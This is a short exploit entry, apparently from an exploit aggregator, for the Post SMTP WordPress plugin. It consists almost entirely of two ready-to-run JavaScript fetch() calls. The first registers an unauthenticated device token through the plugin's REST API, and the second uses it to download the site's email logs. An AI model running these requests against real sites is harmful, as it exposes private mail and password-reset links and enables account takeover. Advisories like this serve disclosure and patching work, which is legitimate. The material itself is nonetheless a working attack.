Share
## https://sploitus.com/exploit?id=WPEX-ID:B66C4057-E3D5-4A92-A319-F3E36441270F
In an unauthenticated browser window on the site frontend, run the following code to authenticate:

await (await fetch( '/wp-json/post-smtp/v1/connect-app', { method: 'POST', headers: { 'fcm-token': 'mytoken', 'device': 'mydevice' } } ) ).text();

Then the email logs can be obtained using the following code:

await (await fetch( '/wp-json/post-smtp/v1/get-logs', { method: 'GET', headers: { 'fcm-token': 'mytoken' } } ) ).text();